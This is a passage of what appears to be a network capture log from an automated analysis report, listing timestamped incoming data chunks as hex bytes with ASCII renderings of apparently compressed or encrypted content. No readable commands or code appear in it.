87 b7 c0 87 e1 54 f8 3e fc 06 b6 b1 95 7b c1 33 5a ca eb e0 cb ad e4 97 f0 83 d6 78 2f 9c db 06 3d 6a 2b fb b7 93 63 e1 88 4e f2 Data Ascii: wlnKIF";eapBy<I;pDw!s`RuKr2r+>f _rr8\|X>m*I5p\Tv5j]u#3\4gI&8m%ZY'uO6UM`W'pf<vh!T>{3Zx/=j+cN
2023-11-18 09:02:40 UTC	3783	IN	Data Raw: 53 e0 c7 f0 80 39 6a 27 38 1c be 08 df 85 cb e0 76 73 d5 b6 f0 58 d8 13 de 06 c7 c0 c9 f0 53 d8 d4 15 6b 09 1e 01 7b c0 f9 70 0d 37 9c 21 70 12 7c 0f 2e 82 ab cf c3 3a 84 63 e1 5b b0 c5 7c ac 37 d8 0f 0e 87 d3 e1 12 38 6a 21 ae 0f bb 7b a8 77 c2 5f 79 e2 5c 82 7f 81 67 c2 8b e0 cd f0 7d b8 04 ae ba 58 dd 1e 1e 07 cf 87 7d e0 48 f8 32 fc 37 dc 6a 89 ba 37 ec 0e fb c1 c7 e1 fb 70 d4 32 cc 1b 1c ef a5 7e 08 f7 5d ae 1e 03 fb c3 91 f0 29 f8 36 dc c4 5b 6d 09 0f 86 7f 83 77 c1 71 70 1a fc 0a ae b6 42 dd 12 fe 15 f6 86 e3 e1 0c f8 1d dc 64 a5 ba 60 95 da 6c 35 f6 38 dc 6c 8d 7a 15 bc 1d be 0f 97 c0 5f af 55 77 83 97 c2 db e0 48 f8 1a 6c b0 4e dd 00 ee 08 0f 83 b7 c1 31 70 0a fc 1c 6e e4 a3 ee 02 0f 84 67 c1 6b e1 10 38 16 ce 84 df c0 d5 d7 ab bf 81 7b c1 21 70 Data Ascii: S9j'8vsXSk{p7!p\|.:c[\|78j!{w_y\g}X}H27j7p2~])6[mwqpBd`l58lz_UwHlN1pngk8{!p
2023-11-18 09:02:40 UTC	3799	IN	Data Raw: c0 cc 6a 56 81 ca 9c 66 2e 03 d2 5e 32 6f 99 93 c4 32 28 cc dd e2 b0 78 2c 5e 8b 9f f0 21 49 64 76 b0 44 a0 b1 83 59 eb 03 86 9f 22 77 ca c3 c8 e6 57 60 fa b4 56 4f 6b b2 b5 cf 7a 0c 24 4a 6a f7 b1 e7 c0 5d 3d b2 5f d9 b7 9c 64 2e 73 6b 43 e7 9c 74 6f b9 75 b1 ea 53 bc 13 de 0f 2f 83 5f c2 af 0b 85 d3 df df 8e 6c 7a 18 54 1f 34 88 aa ea 62 e3 93 7a a4 33 e9 0d 2e 3c 03 2e fc 46 e2 69 c9 34 5f ab a2 d5 d1 c6 69 a7 c1 f4 5f b5 d8 34 3d cd 4e 47 02 bb b7 d0 6f 34 ad 5e 55 6f a1 f7 d5 87 ea 5b e1 be 2e e9 75 8c 26 c0 a4 7d c6 63 23 3f bc fb 4c 7c e3 6d b6 9b 1f e6 3a 74 e5 5c f3 94 79 d1 7c 65 7e 32 d3 89 c2 c8 f9 ae 62 14 3c ce 6e 71 01 fe c1 04 ff 0d 90 23 e4 5a f9 4d 86 ac fa 56 25 28 94 03 76 54 a7 a4 53 47 d5 59 2c 73 76 39 87 9c 77 4e 34 37 9e f2 a8 59 Data Ascii: jVf.^2o2(x,^!IdvDY"wW`VOkz$Jj]=_d.skCtouS/_lzT4bz3.<.Fi4_i_4=NGo4^Uo[.u&}c#?L\|m:t\y\|e~2b<nq#ZMV%(vTSGY,sv9wN47Y
2023-11-18 09:02:40 UTC	3815	IN	Data Raw: cf ec 0b bf 80 1f 4a 18 47 f5 5b 0a bf 2b b1 3c e8 e5 4d f3 52 a6 ee 13 07 f7 65 4e e8 77 f4 27 fa 0a 28 a2 23 46 59 d6 9d 45 e3 59 81 f7 07 f9 7b 8c 3a 3e fc f1 72 73 9d 79 d9 8c 2e 32 08 26 5c d1 1c d1 38 44 ac 55 5d 5b be 89 78 32 59 44 6f fe e0 3c 38 b5 95 59 bd e3 f8 cb ca a7 bc 5d 73 28 ed ac 50 9b 63 81 29 af b1 0a c5 fc 36 fe 6c ff 4a 50 49 91 21 8e ba 6f 12 22 f1 49 32 78 e1 5e 6a f7 66 8e 76 10 1e 22 3b 6d 46 c7 00 c1 df d2 fc ba a9 07 1d ac 83 f7 52 a6 1a bb 8d 9a ac 27 3b c7 df aa 2e 57 47 54 f7 98 e2 a2 a1 7a fb 69 bf b8 29 be 88 e4 11 63 49 6c 65 83 0e ab 0b a7 39 ce 5a 61 3d 52 73 59 13 73 39 d9 5e 61 af b7 a7 3b db 9d 8b 11 6f cc b9 aa 5b db 24 75 fa 1e 3e 7f e5 bc 76 5e 3d 55 e3 bf c5 3f e9 5f 54 fe 2f 8e aa ed cf 44 1c f8 bf d6 a4 33 59 Data Ascii: JG[+<MReNw'(#FYEY{:>rsy.2&\8DU][x2YDo<8Y]s(Pc)6lJPI!o"I2x^jfv";mFR';.WGTzi)cIle9Za=RsYs9^a;o[$u>v^=U?_T/D3Y
2023-11-18 09:02:40 UTC	3831	IN	Data Raw: ac a8 2a d6 89 6d 22 2a 54 a5 0c 72 10 fc de 58 5e 62 f8 bd 86 c7 bd fa 5e 0b 7c b7 19 ef 35 f0 87 f9 0b fc ad fe de 70 4f e2 86 34 78 ff 16 8b 14 42 0f a3 29 64 4e 70 0b 97 5d 13 5a 91 c0 1b e6 0b 64 cd 52 c0 23 9b eb 27 f5 0b 7a 39 a3 ba d1 da e8 69 f4 33 96 a2 16 fe 79 e3 8a 91 1e 5d b1 6b d1 01 34 ac 7f ab ea f4 2a a8 d3 c7 cd 98 56 64 e0 c4 70 d4 7a 62 fd b1 92 b1 08 56 87 75 84 bc b4 1c e7 45 a3 f2 38 80 a7 47 43 cd 79 c1 3f f0 9e f6 74 fb b8 7d db 7e 6c 77 76 cf b9 ef dc 44 22 ab c8 2b 6a 03 3e eb 11 b8 19 24 97 e9 e4 79 40 68 6f a4 ee 15 87 0c 35 c3 db 0b a7 e7 b5 f7 c9 0b 3b 6f 1e f1 6f 28 dd b7 03 69 f0 dd 61 09 59 03 ab 49 a1 95 d5 06 69 4b 00 5d 3e d1 be 43 fe ac ad 37 d6 6b 19 8d 8c a3 c6 59 40 19 a9 68 66 9a 9f fa b4 1c 6d 07 4c 60 18 1d 4f Data Ascii: m"TrX^b^\|5pO4xB)dNp]ZdR#'z9i3y]k4*VdpzbVuE8GCy?t}~lwvD"+j>$y@ho5;oo(iaYIiK]>C7kY@hfmL`O
2023-11-18 09:02:40 UTC	3847	IN	Data Raw: 4b cf 4d 5e 8d d7 e1 3b f9 7e 9e d6 ce 04 fb bc c1 3e 07 b5 ff 97 1d cd b1 9d 6a 4e 43 a7 39 fc f2 f5 ce df ce 15 a8 30 5f 9c 94 6e 3a 37 87 9b cf e5 6e 05 c8 0a fb d0 2b f1 16 f0 98 98 22 ae 48 0f 15 d6 15 55 45 63 88 e0 9e 62 2c 7c fd 33 90 1d a3 ca f8 32 a9 3c 23 6f c8 d7 32 8a 17 db 8b 84 55 d6 80 1a 3b 10 f8 ea 4a c4 6c b7 bd 9f 5e 79 58 67 5f 7f 3b 4e c7 df 0a d7 d9 06 99 51 37 29 bb 5e 5e 6f a5 8f d6 b7 c2 8e 5c d4 13 18 26 a2 cb b5 c6 39 e3 97 a1 03 f3 df 1c bc 82 55 83 e8 6e 6b f6 34 87 02 e6 51 da 52 17 cc 5b c0 2e e3 42 b4 2f 81 53 f8 c3 8a 0a 68 bf 3d db c6 ee b2 c7 2c 3c cd 31 95 1f e2 e7 91 f3 66 b2 3b d9 03 ec e1 90 f7 1e d9 af 00 f7 a4 70 32 39 c5 9c 61 80 f1 2f 39 c9 e1 7c b6 73 a7 40 4c 7d 85 88 0a cf 71 77 86 f5 65 80 8c 2f 64 69 59 4b Data Ascii: KM^;~>jNC90_n:7n+"HUEcb,\|32<#o2U;Jl^yXg_;NQ7)^^o\&9Unk4QR[.B/Sh=,<1f;p29a/9\|s@L}qwe/diYK
2023-11-18 09:02:40 UTC	3863	IN	Data Raw: ee 62 c8 a6 7f 30 9b 16 94 a3 bd 03 de 03 4f 02 cf aa e5 6f 45 7e 95 33 b4 e3 bf 6f 1c c9 b4 f2 da 43 2d 3e c4 5d 2e bd a4 3e 5c af 16 f8 39 ee 35 a2 d0 1c 54 4d 38 74 a2 ca 41 6b 0f f6 ab c6 34 d3 9a 91 f0 8b 9b 9a 6d cd 59 d6 dd ff d1 2d 9f c9 d6 b1 6d ec 11 fb 0a 68 36 2f d6 e9 cb 76 4c a8 cb 13 9c ed ce 19 e7 b2 13 05 bb 40 4a 43 05 68 11 28 30 87 1d 23 72 0a 4f 14 13 9b e5 bf 32 bd 67 78 2e 9c a3 be de 50 6f 13 a2 bb 9f 5e 62 3f 75 50 91 43 13 72 e2 dd d2 1b 12 5f cb ae 09 ad 88 d6 4e 1b 0c 91 76 18 b2 5f 3c 3d a7 ae 05 f8 e2 8b 9e c1 a0 86 80 75 4c 37 16 02 36 df 07 dc fd 3c 44 dc 47 23 2b b5 69 3b f4 29 d9 4b 8f d2 77 34 ba a9 5c 34 f7 9a 77 cc df a8 59 5e 14 d8 6e 23 d4 92 57 2f cb db d8 43 f6 13 a7 c8 0b 03 7f 6f c0 4f 00 e2 f8 c9 53 db 99 a0 6a Data Ascii: b0OoE~3oC->].>\95TM8tAk4mY-mh6/vL@JCh(0#rO2gx.Po^b?uPCr_Nv_<=uL76<DG#+i;)Kw4\4wY^n#W/CoOSj
2023-11-18 09:02:40 UTC	3879	IN	Data Raw: 7e ec 58 5f cf 74 86 38 59 ce 08 b0 be 1c 27 d7 91 4a 74 29 43 e4 73 9c 85 f8 b6 4a 2f 27 f8 ef 60 24 29 c9 20 9c 11 66 ac 02 a3 50 e4 ab 74 43 ca 3c 6c d3 09 b0 e9 72 7d 21 31 a3 4a 7d 29 b1 a3 6a bd 86 18 52 9d be 99 58 52 83 be 53 3f 3a 06 6d 46 56 dd ca 1b f8 4e de c8 45 12 35 08 0f ac 44 1e ab 41 26 db 80 5c b6 19 38 60 ab d1 60 ec 34 1a 8d 3d 46 18 85 b7 1e 8e c3 4d d6 7e a1 7c 5c 6e 48 02 26 15 03 37 97 58 a5 c0 ce 73 45 36 fb b7 48 4f aa 36 a8 fe 55 77 cc df bf 07 f9 7d 3f 6f e6 87 c0 cb 62 9c 58 27 ce 89 77 b2 83 bf 76 5a e2 0f 33 08 0f fd 15 a6 24 35 18 d4 6b 31 02 1c 3f cc 01 e9 c4 eb 07 58 99 60 00 59 d6 08 b0 80 1c 2b f7 70 66 2e b4 8a ac 69 d6 b1 5f f7 5f f7 e1 1a b0 86 0d 6e 9d bb d9 ad 77 b7 ba 22 e6 34 ba 7b 10 77 f6 bb cd ee 21 57 f2 62 Data Ascii: ~X_t8Y'Jt)CsJ/'`$) fPtC<lr}!1J})jRXRS?:mFVNE5DA&\8``4=FM~\|\nH&7XsE6HO6Uw}?obX'wvZ3$5k1?X`Y+pf.i__nw"4{w!Wb
2023-11-18 09:02:40 UTC	3891	IN	Data Raw: 09 18 17 17 1a 77 b0 f6 f8 92 7c 4c 3e 18 fd 7d 8e 24 60 3a d2 f1 cf a9 eb 12 c5 71 a0 d4 b4 6d d4 e7 fd de 07 66 59 7c 3e a5 c2 fa ca d9 44 1b 94 07 63 c2 70 ce 39 85 e1 a0 d1 69 24 db 76 5d 18 e2 61 51 f4 f7 4a 41 fd 6f ad 94 ca 92 d1 c8 cc de 03 22 d0 ae c8 e4 64 8d c7 cc c7 e9 ee 34 5c 8e 6f d3 c7 d3 71 8e f1 f0 33 a1 f9 4a ad e4 81 92 a5 38 b4 b7 e3 a8 d8 6d a0 42 77 01 5a 4d ab f7 78 82 64 56 32 3f 3c a2 94 10 46 ca 43 80 0b c4 c4 a1 13 e4 34 84 5c 79 29 29 22 c8 9d 38 ba 6d 34 ba 23 fd 7b e4 43 82 ae 83 34 5f 56 2d 4d 9b de 0d 3c 79 29 60 64 8f ef 4e a5 c4 21 37 9b dd 9b d1 40 59 be b8 41 79 12 07 f4 22 46 7c a2 ad 29 57 97 fb 80 38 ff 00 db db 75 90 75 0a fb d0 18 a6 1c d3 7b ba 0e d6 a4 6c de 8a 3e b3 79 52 38 f0 02 fc ee ed 1a 71 1d f0 bd 0c 24 Data Ascii: w\|L>}$`:qmfY\|>Dcp9i$v]aQJAo"d4\oq3J8mBwZMxdV2?<FC4\y))"8m4#{C4_V-M<y)`dN!7@YAy"F\|)W8uu{l>yR8q$
2023-11-18 09:02:40 UTC	3907	IN	Data Raw: 91 af be a9 c5 f5 95 d1 13 81 66 d1 c5 5a 03 d1 a3 2e c2 4c 47 cf 4d 8f a6 a3 ff 53 7a 14 4a 4a 89 18 ff 14 36 f4 55 a1 17 e7 16 36 28 bc a1 fd 0e 23 64 82 38 dd 14 44 87 50 94 b0 d1 5e 9e b2 79 d2 f8 b8 82 f5 9d c8 97 09 d8 c3 29 5c c0 ae 20 3f 9f 73 08 d8 e7 c0 84 ac 5b 2b 65 4d 53 50 f3 be 34 85 6b 0c ba 4f 80 72 b3 be 0c 81 7b c4 d1 e7 40 13 9b c6 8f be 66 6d 0b 38 0a 6c 2c 18 0c db 82 1f da c4 a6 5d 42 90 b5 f7 1f 62 ed ae 8e ce b0 d0 11 0c 5b 59 4b f0 50 92 ab 05 74 9a 40 84 9f 22 c9 c2 b3 27 03 a0 30 1f 4d a1 77 43 c7 39 69 28 cd ba 8e 63 0a 1b 76 19 88 3e d5 99 1c 93 1f cf ba 07 7d 43 da 6d 64 6e 96 21 8a 47 68 79 9f a1 13 4e 90 7c 27 7b e9 1c 06 9a 3d 6f b0 ce ae e3 ec 24 da 21 c2 a0 ea fc 31 da 9d 74 30 64 b9 19 aa c4 85 7e c0 f2 6a 63 86 b8 e8 Data Ascii: fZ.LGMSzJJ6U6(#d8DP^y)\ ?s[+eMSP4kOr{@fm8l,]Bb[YKPt@"'0MwC9i(cv>}Cmdn!GhyN\|'{=o$!1t0d~jc
2023-11-18 09:02:40 UTC	3923	IN	Data Raw: bc 4b 31 34 47 27 6b 01 29 75 20 3c 0f ac 1e 2d 08 88 ae 2b 93 aa 50 30 53 fd 20 c0 cf 5d fb 95 09 b5 bf d2 fc 93 78 e5 38 e3 4d c3 eb 6f f9 4f 19 36 16 ce c7 7b 5b 0f 68 df e1 e1 5d 52 a1 aa 55 56 f9 88 19 6f 93 df 74 89 95 7c 77 2b 59 3f f4 62 f3 27 d0 8b 59 23 74 4e 21 d5 40 1a 66 0e 63 88 3a 71 d3 2e f2 44 c3 3a 89 99 b1 4c 3d 9e 91 86 7f e1 35 80 7b 2d 3a 8c ba 75 81 90 f7 0d d1 8f 01 02 f3 66 8a fe eb ac 3c 16 20 e7 2e 42 99 36 9f af ea 92 be 80 f9 71 d4 a8 08 b2 7d da 4c dc 55 1a 81 c6 ee b7 8e 42 b2 76 91 5e e6 b7 96 84 32 66 fa 84 cd e2 56 f3 73 20 4a ea a0 ca fd 5f 55 57 a1 aa 51 c9 0e b0 fe fd 79 52 78 04 0f 1a 7c 67 38 1a 4d 18 d4 98 81 d4 30 63 24 8f 1e 82 cc 5f 4f a8 f2 31 f3 39 aa bc 18 a5 ab 98 90 eb a7 e7 ca f5 c9 09 c8 a5 9d 89 e7 12 cf Data Ascii: K14G'k)u <-+P0S ]x8MoO6{[h]RUVot\|w+Y?b'Y#tN!@fc:q.D:L=5{-:uf< .B6q}LUBv^2fVs J_UWQyRx\|g8M0c$_O19
2023-11-18 09:02:40 UTC	3939	IN	Data Raw: c1 e2 53 77 8e 33 af af 90 ad 97 29 f4 48 5c 94 1e 5a fe 56 6b c0 e5 b6 8c ec 79 8e ea 75 66 0f 0b de 25 05 c4 c5 bf 58 56 3a 41 a9 30 ca 21 b0 54 91 79 30 fc 9c 7f b1 27 b5 58 b7 3a 3b dd d1 36 24 ed 6b 57 45 f7 c6 4f be ce 71 b3 9f 72 35 95 ae 8c 9e 76 89 66 a5 73 f8 6c 73 91 96 42 f2 a1 95 cf ce 0e e2 fb 55 ae 18 5b be 74 d3 96 e0 a1 6d a6 a3 be 4b 27 ec da e8 bb 69 82 65 b2 ee 96 b9 1f 2f da 7a b8 2a b4 cb 72 86 4c 3b 5e 77 f4 f3 83 ab bf 36 d7 7d b0 1b 9f 2d 76 dd 3d c0 ef c3 e8 50 a9 25 2d 0e 39 25 8e 13 6a 9f 75 c4 b3 bd 27 bd 9b 15 68 99 be a7 22 a1 b8 23 df d8 7f 40 f4 5a 66 d8 eb 85 dc 52 b7 7a e7 cc e9 ae dd 56 df 1a d2 46 66 a6 24 87 f7 e7 36 f7 a7 ae b2 6a cf b5 18 bd 77 58 e3 50 ed 9d b3 96 5a a7 bc a8 3c 63 e0 76 f6 ce c7 79 97 4c 67 bd 79 Data Ascii: Sw3)H\ZVkyuf%XV:A0!Ty0'X:;6$kWEOqr5vfslsBU[tmK'ie/z*rL;^w6}-v=P%-9%ju'h"#@ZfRzVFf$6jwXPZ<cvyLgy
2023-11-18 09:02:40 UTC	3955	IN	Data Raw: 82 b3 c1 3a 9d 6e b0 33 d3 47 cd 41 8a ac 38 79 8e c5 c1 75 8e 25 16 e2 3c 73 c2 aa 08 66 ad 8b da 75 e8 d9 04 33 83 17 b8 c8 55 3f c9 b4 5e 38 e8 bf 94 d0 83 fe 2c dc 93 52 86 14 ed 49 45 13 5f 17 9d cc 43 c2 e9 13 2f 64 59 d7 c3 6e 32 a4 87 dd 08 68 08 d7 37 9b 59 c1 e9 4a ba 92 a6 5c 49 00 9f 14 35 2b 78 f5 bd 5d b3 82 b3 63 71 92 dc b1 04 cc d5 01 92 15 9c ee 29 c7 29 f7 94 5c 17 73 69 ba 0b c2 b3 82 3a e6 6a 56 92 b8 fd f4 f8 62 33 cb fa 5c bb 96 64 d5 a5 4a 97 97 b2 ae ca e5 85 57 ca ce 56 4c 2e 12 d6 b3 2e 35 de bd 1a dd e7 eb 94 4e 9f af eb 3e 5f 77 fd b0 99 15 9c db 4f b2 ae 07 3c 01 38 c8 bf 82 17 0d 28 b3 71 07 c7 9a d5 9d 40 e3 46 95 ad 57 77 02 8d ae 39 07 d7 46 55 c0 ba 7b 65 66 9c 1d 7b 17 d6 ec bb 3b 81 ce 0b 59 b7 af 37 33 e3 ec da e8 67 Data Ascii: :n3GA8yu%<sfu3U?^8,RIE_C/dYn2h7YJ\I5+x]cq))\si:jVb3\dJWVL..5N>_wO<8(q@FWw9FU{ef{;Y73g
2023-11-18 09:02:40 UTC	3971	IN	Data Raw: e9 27 92 3a 69 78 7d 64 a6 23 17 d4 fe 95 99 12 c8 e1 65 66 3a 50 34 92 7e 22 dd 51 0d 0f 32 53 20 33 d3 81 72 8a f4 93 5c 59 d4 d3 80 4a 88 f4 93 7e 7a ab 15 23 5a 4c 91 99 8e a4 b4 75 4a ec d7 f0 7d 82 00 a6 bd 0a 19 32 f4 93 e4 24 f5 73 e2 3b 2e 0a 9a 1f f1 fa 07 c7 bb 44 41 07 15 67 9a ad 24 ad 44 97 82 c6 7f 2f 0a 8a 4c 39 fb 49 e6 aa f2 94 ed b9 14 14 b9 bc f4 93 7c fc 7d 81 4d 1b 95 63 b4 7d 29 e8 60 e2 31 d1 fd 8c 0e 26 f0 12 5d 0a 3a 86 f6 bc 46 fe 60 ff ca d1 45 41 73 86 4f 39 b6 28 e8 18 e7 52 d0 31 9b 28 68 46 27 7c ec a9 bd d1 91 45 47 3c bc b4 37 0a 74 29 28 2a 3b d1 4f 6e 52 5c 1a da 32 05 9a 7e 9f a0 33 39 fd 04 4d c6 ed 27 23 55 9c 1c 5e ce b5 c8 8b a5 9f 8c 4c 20 f4 f0 60 84 35 50 2a 89 6a f8 88 b0 ce 27 bb b7 f2 94 31 83 11 d6 40 dd 11 Data Ascii: ':ix}d#ef:P4~"Q2S 3r\YJ~z#ZLuJ}2$s;.DAg$D/L9I\|}Mc})`1&]:F`EAsO9(R1(hF'\|EG<7t)(;OnR\2~39M'#U^L `5Pj'1@
2023-11-18 09:02:40 UTC	3987	IN	Data Raw: b7 01 ba bb ce 01 b5 0d 12 60 d4 1c d4 46 f6 1b a4 36 72 50 e3 95 ce 7f 03 9e 72 e8 1c 90 d5 a3 00 ba 47 cb 88 12 03 ec 1e 2b 6f c4 1b a0 7b d6 ed b2 01 a0 64 ea 08 ef cd 6c 8e f0 82 52 2a 69 2b 99 a3 f8 eb 4c 9d ec f9 55 cd e5 9f 54 dc 85 5a 97 d7 55 02 d8 bd 6a 4c 02 5f 7e 1e 09 68 72 c5 4d e2 fc f2 eb f2 d0 3b d6 50 2a a4 cf 87 81 3f da d2 e5 8e 0f 4b af ec f6 91 7d 65 3f 65 00 59 12 c1 d5 f5 f2 c8 26 d0 61 ab c6 30 06 0a 34 d8 71 4d d8 4a 04 0a ec 70 fc d8 40 15 80 0e 4b c2 d9 3f 1d 48 65 d0 c5 ae 31 b0 f2 23 01 34 b1 2f 62 41 df 8f 04 13 76 db db 20 80 a5 75 a3 52 5f 1e 50 c4 a6 9c a7 a5 29 e7 29 aa 65 f2 00 03 94 74 05 7d a6 34 41 9f 35 fc 42 2b 67 12 80 2c a9 64 17 53 d7 04 48 89 0a 57 af 4f 7f fe df 61 a0 cf 50 23 23 79 4f bb 05 2c fd 4c ff 80 09 Data Ascii: `F6rPrG+o{dlRi+LUTZUjL_~hrM;P?K}e?eY&a04qMJp@K?He1#4/bAv uR_P))et}4A5B+g,dSHWOaP##yO,L
2023-11-18 09:02:40 UTC	4003	IN	Data Raw: d3 3f 00 ee f5 38 e6 22 e0 98 91 ae a0 02 68 6c f5 07 34 70 4d ee c5 6d 5a 2d 0c 18 27 d7 66 6f 36 ea 6d e0 1e 4c a0 58 e6 aa 0a 14 2b 2f 75 99 b7 52 13 83 83 62 9b dc 59 bc 0c ac 52 0f 3a eb 14 0d 48 b1 b6 bd c5 dd b6 6c a0 ee 3e db cb ce 06 40 65 d3 f2 3a b9 73 0f b8 0f fb 9f 14 77 27 71 c0 50 da 6c ed 21 c2 7d 3c b2 87 48 50 54 c6 a0 81 84 dc 35 72 58 14 9f b9 0d dc 83 a2 da 48 2b 01 87 8b 87 ef 8b 3d e1 01 5c 9c 00 a0 3e 34 b5 0a 00 6a 4f 5f 67 c0 f8 b5 14 a8 62 47 d5 79 5b 0a a8 95 f7 e4 de b5 5b 87 db 40 c5 ba 16 6a 35 f5 02 d4 9c 7b 8f e6 c7 65 fe 3a 00 73 9f e7 75 d6 7f 1e 20 95 32 53 6c b5 fc 03 cc 3d 1c 73 85 56 02 2c 7b ac cf 1d 07 e0 70 f1 46 08 90 8f 4b 01 84 6c cf 95 1b 00 f7 ee 25 da 43 13 80 ec dd 6b f1 f7 14 67 2d d6 ec ec 04 13 7f 2e 05 Data Ascii: ?8"hl4pMmZ-'fo6mLX+/uRbYR:Hl>@e:sw'qPl!}<HPT5rXH+=\>4jO_gbGy[[@j5{e:su 2Sl=sV,{pFKl%Ckg-.
2023-11-18 09:02:40 UTC	4019	IN	Data Raw: ea 80 62 48 73 84 b4 2b 1d 64 48 b3 67 95 2b ea d8 72 3d 57 4f 86 cf 3b 5d 5e a9 91 3d a2 71 34 da f0 bc 50 b7 d8 f0 7a 67 a4 b3 c7 a4 bf 7c 82 e9 aa d6 a3 4b d0 ee 6a 3d a0 68 7e f3 ac ea 31 bf f5 ce 00 68 8f 60 bf b3 70 a0 9c cf 7a 79 d7 f6 61 9e dd 77 3f b7 6b fb 30 e3 ee 36 21 74 d7 f6 01 c5 90 66 7f 06 d7 f6 a1 49 fe de 13 c2 f9 63 6d b6 5f d3 c7 25 7f 40 b1 e4 8f 5f de 25 7f 1e 6a 30 49 be c7 7b bc 7c 6e 40 d6 81 a5 6b 12 5c 7e 3c 1c 85 67 60 6e ba b6 c2 87 d5 c0 b2 19 45 ed 9e 8c cb 76 08 04 de 6f 0d 6f dc b6 2c 20 52 7d 1d 97 09 2c 04 fb de ea 49 9c e2 10 22 5d 73 2b 4e e0 0e 62 7c 16 77 b7 65 a1 ab 82 91 97 b0 11 63 1d a2 3f cb da d0 e7 cb 26 04 c4 45 ee 26 67 0c 6a 5d 15 8c bc cc b8 82 11 a8 7b 5f 12 75 57 30 02 55 cb 7e f9 19 83 5a 57 5a 59 7f Data Ascii: bHs+dHg+r=WO;]^=q4Pzg\|Kj=h~1h`pzyaw?k06!tfIcm_%@_%j0I{\|n@k\~<g`nEvoo, R},I"]s+Nb\|wec?&E&gj]{_uW0U~ZWZY
2023-11-18 09:02:40 UTC	4035	IN	Data Raw: be 86 8c 3b 0a e9 7c 74 03 f0 d2 e4 5c 9e cf fb c5 e8 a5 ac 41 67 29 78 31 7a 6d 29 5c 75 73 94 2f ec be 71 08 09 a3 57 36 89 d1 6b 9f 9b 65 f4 72 07 05 a6 8b 65 af b2 6e 81 e1 e2 38 36 a1 44 60 b9 38 3e 48 b6 15 18 a0 5b f6 aa 9f 50 82 bd 2a 24 d9 ab 7e fa 4a 80 92 c3 d7 eb 2c d2 1f 17 cb 30 e5 67 22 40 4f 56 f1 26 1a 58 89 ee ed b3 df 19 1b d4 c2 ff aa 7e dc 72 c6 b2 6e 5d ed 55 6d ec 3e c1 ca 39 ee fc 71 df 17 06 9e 2d d9 c0 e3 c1 5f 18 78 5a 50 39 d6 be 4a bc 8e d4 5e 9f 9a 9a 77 86 f5 84 54 f4 f1 06 f4 5b e6 a0 ec 09 e6 a0 76 cb aa cb 44 16 b0 12 d9 3b 53 49 c3 ee 13 56 8d b3 f1 bb 33 50 27 a4 f7 f4 bb e5 b9 41 79 b8 5f b6 2d ca c3 fd a1 38 ac 44 0c a7 61 25 0a bf ed e7 4c 88 86 dd 27 2c 26 da f8 f9 51 35 2c 39 5b 92 25 27 9b c4 92 b3 77 07 32 d9 fc Data Ascii: ;\|t\Ag)x1zm)\us/qW6keren86D`8>H[P*$~J,0g"@OV&X~rn]Um>9q-_xZP9J^wT[vD;SIV3P'Ay_-8Da%L',&Q5,9[%'w2
2023-11-18 09:02:40 UTC	4051	IN	Data Raw: ee d3 20 68 e0 c4 aa 05 87 16 58 4c a4 81 13 94 17 a7 36 e5 65 cd bb 27 4d 10 2c 72 46 4f 9a 20 68 20 61 c5 32 d0 b0 e2 c0 7d 7a ba eb 11 42 55 93 9c 61 7d 80 e6 0c 9f d0 17 89 05 42 45 be bd 43 06 c1 22 57 5f ae 45 11 8a 2e 72 30 05 2d 59 57 fb 6b 62 c9 94 96 2c d0 52 54 ed 97 69 29 0b 9c 7a 0d 16 20 68 09 a1 bf 6a c2 0c fd 4d 2e f5 9e 55 bf 97 b1 28 6b e1 80 91 8b f4 01 a3 53 cf df 6e d6 97 f9 27 e7 ff 6f 37 a6 cb fc 93 45 5e 2f 27 92 cb bc de 38 4d 70 4f 9a 20 58 e4 03 67 10 65 f2 d8 19 64 25 a2 b7 7e 2a f3 7a b9 02 5c 0d 87 79 bd 91 77 ff d5 d9 09 08 a5 be 0b 00 0a b1 9d 1a 87 ab ff fa b1 90 25 d1 53 2c 08 59 02 e4 ca ef ca db c8 95 45 ba af 7e 58 d3 7d 33 34 bb 29 78 ec 7f b2 9e af 73 47 29 54 ab 1e 70 5b d4 c6 3e e6 b6 e4 95 80 9f b6 c4 de 2a 39 9e Data Ascii: hXL6e'M,rFO h a2}zBUa}BEC"W_E.r0-YWkb,RTi)z hjM.U(kSn'o7E^/'8MpO Xged%~z\yw%S,YE~X}34)xsG)Tp[>9
2023-11-18 09:02:40 UTC	4067	IN	Data Raw: 59 be 29 25 51 f9 75 19 68 5c 32 e3 4a 0a e9 7e f1 6f 53 74 03 f2 37 e9 76 03 da d4 73 76 d4 04 d2 a4 d7 7c 68 47 40 df a4 1f a7 21 01 7d 93 7e 9c 86 08 dc 7d fa c9 17 46 50 a3 38 d3 b6 09 58 08 6f e2 a3 4a df c4 af f5 26 f4 5d 40 dc 0a 7d d7 00 5c 11 fa be d6 9b d0 77 01 35 47 a1 ef ae 32 42 df 37 75 3c 8f 08 fc 05 69 64 f4 52 b7 22 c6 1d a1 9a 67 cb bf 22 3c 1d 41 9b ed 4e bd a7 b3 57 6f ea 44 2c 10 f8 6f 78 13 b5 2e 60 d9 2b 4d d4 02 12 b2 8e 1b 90 80 1a af f0 74 fa 88 10 f8 7b af f3 66 a2 80 64 2f 3c 27 18 cd 01 90 de 0b 37 8b c9 6d c3 f0 42 4f 0a ef 65 01 57 d9 cf 26 1e ff 9a bf f7 e2 0b 8b da de 12 b8 ca 39 cf e0 5e 7a 61 71 c0 79 2f 82 80 0c ba 8a 99 e7 0c 2b 89 81 b9 ef d8 54 1a 54 15 3f 91 b2 d6 c0 dc 35 62 55 0c 2c bb 46 44 a5 41 61 f1 09 66 37 Data Ascii: Y)%Quh\2J~oSt7vsv\|hG@!}~}FP8XoJ&]@}\w5G2B7u<idR"g"<ANWoD,ox.`+Mt{fd/<'7mBOeW&9^zaqy/+TT?5bU,FDAaf7
